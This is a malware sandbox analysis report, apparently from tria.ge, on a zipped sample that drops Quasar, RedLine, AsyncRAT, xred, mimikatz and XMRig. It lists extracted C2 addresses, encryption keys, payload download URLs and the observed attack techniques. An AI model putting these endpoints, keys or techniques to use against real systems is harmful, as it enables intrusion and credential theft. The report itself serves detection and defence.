Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
25/01/2025, 23:53
250125-3w9aqawpap 1025/01/2025, 23:45
250125-3r6c9stre1 1025/01/2025, 01:01
250125-bc9zcsypbn 1013/01/2025, 17:50
250113-wewjza1pes 1013/01/2025, 17:32
250113-v4m4fssrgj 10Analysis
-
max time kernel
408s -
max time network
1200s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
13/01/2025, 17:50
Behavioral task
behavioral1
Sample
New Text Document mod.exe.zip
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
New Text Document mod.exe.zip
Resource
win10ltsc2021-20250113-en
Behavioral task
behavioral3
Sample
New Text Document mod.exe.zip
Resource
win11-20241007-en
General
-
Target
New Text Document mod.exe.zip
-
Size
392KB
-
MD5
209c2bed74ce311f3de2c3040f5cbd8b
-
SHA1
676dbe2bbf178ca27210c8a2e37aa9652f4e17d5
-
SHA256
672ad2d52af206cc63cebe2c801181d3b406aae5891cc57bdaafd5eea3d61fe6
-
SHA512
44b5207ce1a79c220ed014b7803ba4f3b89b0aa81f2232e152da9e5c8004c164a281d8806843a10590e3c55b902ef5e3f359bc117b80b11d052fe60324709324
-
SSDEEP
6144:PiyQGVN3t3bmwUUoI7a+OjFjjGFEduVVZ4vELL2VzCGb49pRYCEheDmDUKUQWCCJ:P/HfRx7aNFXuhTL2I70SmpXCqry
Malware Config
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Extracted
quasar
1.4.1
Office04
other-little.gl.at.ply.gg:11758
0.tcp.in.ngrok.io:14296
fbbc34bd-7320-405e-aebb-d4c666ee475f
-
encryption_key
FEA99DED4EFE826DE2850621FD7919E62525FD26
-
install_name
DirectX111.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
DirectX
-
subdirectory
SubDir
Extracted
redline
1V
195.177.92.88:1912
Extracted
asyncrat
0.5.8
Default
0.tcp.in.ngrok.io:10147
38.240.58.195:6606
Q52IWD1RYgpZ
-
delay
3
-
install
false
-
install_file
Listopener.exe
-
install_folder
%AppData%
Extracted
redline
Standoff
89.23.101.77:1912
Extracted
quasar
1.3.0.0
Office04
20.107.53.25:25535
QSR_MUTEX_zQ0poF2lHhCSZKSUZ3
-
encryption_key
E2xbpJ93MnABcIqioTDL
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
redline
first
212.56.41.77:1912
Extracted
quasar
1.4.1
RuntimeBroker
qrpn9be.localto.net:2810
fc5edab1-6e8f-4963-98aa-bd077e08750f
-
encryption_key
F749DCAC94A1FC3102D2B0CFBBFCB76086F86568
-
install_name
RuntimeBroker.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
RuntimeBroker
-
subdirectory
a7
Extracted
quasar
1.3.0.0
sigorta
217.195.197.170:1604
QSR_MUTEX_9WjAcLINYji1uqfzRt
-
encryption_key
B2vTTMiPGqHXv2xzSGYH
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
quasar
1.4.1
ROBLOX EXECUTOR
192.168.50.1:4782
10.0.0.113:4782
LETSQOOO-62766.portmap.host:62766
89.10.178.51:4782
90faf922-159d-4166-b661-4ba16af8650e
-
encryption_key
FFEE70B90F5EBED6085600C989F1D6D56E2DEC26
-
install_name
windows 3543.exe
-
log_directory
roblox executor
-
reconnect_delay
3000
-
startup_key
windows background updater
-
subdirectory
windows updater
Signatures
-
Asyncrat family
-
Meduza Stealer payload 2 IoCs
resource yara_rule behavioral1/memory/1748-802-0x0000000000400000-0x0000000000526000-memory.dmp family_meduza behavioral1/memory/1748-801-0x0000000000400000-0x0000000000526000-memory.dmp family_meduza -
Meduza family
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
description flow ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe 85 api.ipify.org Process not Found 86 api.ipify.org Process not Found 437 ip-api.com Process not Found 533 api.ipify.org Process not Found 658 api.ipify.org Process not Found 660 api.ipify.org Process not Found 384 ip-api.com Process not Found 532 api.ipify.org Process not Found -
Quasar family
-
Quasar payload 12 IoCs
resource yara_rule behavioral1/files/0x0008000000023b9f-210.dat family_quasar behavioral1/memory/2972-217-0x0000000000BB0000-0x0000000000ED4000-memory.dmp family_quasar behavioral1/files/0x000200000002323e-3286.dat family_quasar behavioral1/memory/1860-3291-0x0000000000910000-0x000000000096E000-memory.dmp family_quasar behavioral1/memory/4556-3426-0x0000000000780000-0x0000000000AA4000-memory.dmp family_quasar behavioral1/files/0x000400000002324f-3459.dat family_quasar behavioral1/memory/3436-3464-0x0000000000690000-0x00000000006EE000-memory.dmp family_quasar behavioral1/files/0x0018000000023c20-3599.dat family_quasar behavioral1/memory/5792-3594-0x0000000000610000-0x0000000000934000-memory.dmp family_quasar behavioral1/memory/5624-3640-0x0000000000F30000-0x0000000001254000-memory.dmp family_quasar behavioral1/memory/6480-5509-0x0000000000CE0000-0x0000000001004000-memory.dmp family_quasar behavioral1/memory/5172-5542-0x0000000000390000-0x00000000006B4000-memory.dmp family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
resource yara_rule behavioral1/files/0x0009000000023ba5-243.dat family_redline behavioral1/memory/2576-252-0x0000000000950000-0x00000000009A2000-memory.dmp family_redline behavioral1/files/0x000200000002323d-3275.dat family_redline behavioral1/memory/2276-3281-0x0000000000D20000-0x0000000000D72000-memory.dmp family_redline behavioral1/files/0x0006000000023238-3352.dat family_redline behavioral1/memory/7068-3357-0x0000000000840000-0x0000000000892000-memory.dmp family_redline -
Redline family
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 752 created 64 752 WerFault.exe 264 -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description pid Process procid_target PID 2908 created 64 2908 svchost.exe 264 PID 2908 created 1980 2908 svchost.exe 267 PID 2908 created 316 2908 svchost.exe 13 -
XMRig Miner payload 2 IoCs
resource yara_rule behavioral1/files/0x000200000002324c-3371.dat family_xmrig behavioral1/files/0x000200000002324c-3371.dat xmrig -
Xmrig family
-
Xred family
-
Async RAT payload 2 IoCs
resource yara_rule behavioral1/files/0x00080000000231d4-3112.dat family_asyncrat behavioral1/files/0x0003000000023128-3390.dat family_asyncrat -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
mimikatz is an open source tool to dump credentials on Windows 1 IoCs
resource yara_rule behavioral1/files/0x000a0000000231d1-3212.dat mimikatz -
Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4228 powershell.exe 6340 powershell.exe 7388 powershell.exe 5148 powershell.exe 5760 powershell.exe 3888 powershell.exe 9040 powershell.exe 4596 powershell.exe 9080 powershell.exe 5360 powershell.exe 1368 powershell.exe 6740 powershell.exe 8144 powershell.exe 8292 powershell.exe 4600 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Indicator Removal: Network Share Connection Removal 1 TTPs 2 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
pid Process 9152 cmd.exe 8188 net.exe -
resource behavioral1/files/0x0008000000023bb2-268.dat -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation gem1.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation chrtrome22.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation Synaptics.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation ._cache_New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation ._cache_Synaptics.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cbot.exe cbot.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cbot.exe cbot.exe -
Executes dropped EXE 24 IoCs
pid Process 3424 New Text Document mod.exe 3160 ._cache_New Text Document mod.exe 2352 Synaptics.exe 3664 ._cache_Synaptics.exe 2972 voidware_loader.exe 2576 build.exe 4688 DirectX111.exe 5416 gem2.exe 5220 gem1.exe 4856 gem1.exe 1748 gem1.exe 5892 Lightshot.exe 5460 cbot.exe 5536 Client.exe 1668 svhost.exe 3764 mimikatz.exe 3856 123.exe 6212 xmrig.exe 5348 chrtrome22.exe 2276 Fixer.exe 1860 Client-built.exe 7068 Steanings.exe 3828 xmrig.exe 6252 AsyncClientGK.exe -
Loads dropped DLL 9 IoCs
pid Process 2352 Synaptics.exe 2352 Synaptics.exe 2352 Synaptics.exe 2352 Synaptics.exe 2352 Synaptics.exe 2352 Synaptics.exe 2352 Synaptics.exe 2352 Synaptics.exe 2352 Synaptics.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" New Text Document mod.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 23 IoCs
flow ioc 881 0.tcp.in.ngrok.io 955 0.tcp.in.ngrok.io 24 raw.githubusercontent.com 148 drive.google.com 408 0.tcp.in.ngrok.io 521 0.tcp.in.ngrok.io 576 0.tcp.in.ngrok.io 666 0.tcp.in.ngrok.io 25 raw.githubusercontent.com 147 drive.google.com 352 raw.githubusercontent.com 833 0.tcp.in.ngrok.io 917 0.tcp.in.ngrok.io 146 drive.google.com 491 0.tcp.in.ngrok.io 752 0.tcp.in.ngrok.io 794 0.tcp.in.ngrok.io 355 0.tcp.in.ngrok.io 390 0.tcp.in.ngrok.io 445 0.tcp.in.ngrok.io 477 raw.githubusercontent.com 567 raw.githubusercontent.com 711 0.tcp.in.ngrok.io -
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 384 ip-api.com 437 ip-api.com 532 api.ipify.org 533 api.ipify.org 658 api.ipify.org 660 api.ipify.org 85 api.ipify.org 86 api.ipify.org -
pid Process 8972 cmd.exe 6376 ARP.EXE -
Power Settings 1 TTPs 24 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 9012 powercfg.exe 7708 powercfg.exe 8216 powercfg.exe 4532 powercfg.exe 6848 cmd.exe 4916 powercfg.exe 8028 powercfg.exe 5140 powercfg.exe 8740 powercfg.exe 4532 powercfg.exe 8952 powercfg.exe 6040 powercfg.exe 6988 powercfg.exe 1916 powercfg.exe 6996 powercfg.exe 7012 powercfg.exe 3056 powercfg.exe 8528 powercfg.exe 6348 powercfg.exe 5320 powercfg.exe 5136 powercfg.exe 3572 powercfg.exe 7004 powercfg.exe 5880 powercfg.exe -
Drops file in System32 directory 14 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\MRT.exe Lightshot.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\MRT.exe gem2.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 OfficeClickToRun.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 5220 set thread context of 1748 5220 gem1.exe 160 PID 5416 set thread context of 4100 5416 gem2.exe 196 PID 5892 set thread context of 7020 5892 Lightshot.exe 227 PID 5892 set thread context of 7048 5892 Lightshot.exe 228 PID 5892 set thread context of 7132 5892 Lightshot.exe 233 -
resource yara_rule behavioral1/files/0x000a00000001e5ae-3046.dat upx behavioral1/memory/5460-3051-0x00007FF662BA0000-0x00007FF662BB7000-memory.dmp upx behavioral1/memory/5460-3073-0x00007FF662BA0000-0x00007FF662BB7000-memory.dmp upx -
Drops file in Program Files directory 44 IoCs
description ioc Process File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Crashpad\metadata setup.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe File opened for modification C:\Program Files\Crashpad\settings.dat setup.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe -
Launches sc.exe 31 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5052 sc.exe 6596 sc.exe 6788 sc.exe 5584 sc.exe 9072 sc.exe 7652 sc.exe 5700 sc.exe 2400 sc.exe 1028 sc.exe 2632 sc.exe 5228 sc.exe 8208 sc.exe 2760 sc.exe 8440 sc.exe 6840 sc.exe 7484 sc.exe 7588 sc.exe 5396 sc.exe 4888 sc.exe 2800 sc.exe 8400 sc.exe 4012 sc.exe 6884 sc.exe 8408 sc.exe 1984 sc.exe 8636 sc.exe 5496 sc.exe 6072 sc.exe 5424 sc.exe 6516 sc.exe 6452 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
pid pid_target Process procid_target 5108 5220 WerFault.exe 155 4108 5604 WerFault.exe 348 1560 5604 WerFault.exe 348 5348 2016 WerFault.exe 342 8416 4916 WerFault.exe 380 7012 952 WerFault.exe 434 -
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Client.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fixer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Steanings.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AsyncClientGK.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gem1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gem1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Client-built.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 7556 cmd.exe -
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x0009000000023c69-5399.dat nsis_installer_1 behavioral1/files/0x0009000000023c69-5399.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe -
Discovers systems in the same network 1 TTPs 2 IoCs
pid Process 7836 net.exe 4100 net.exe -
Enumerates system info in registry 2 TTPs 14 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 2 IoCs
pid Process 7584 taskkill.exe 8392 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed lsass.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created 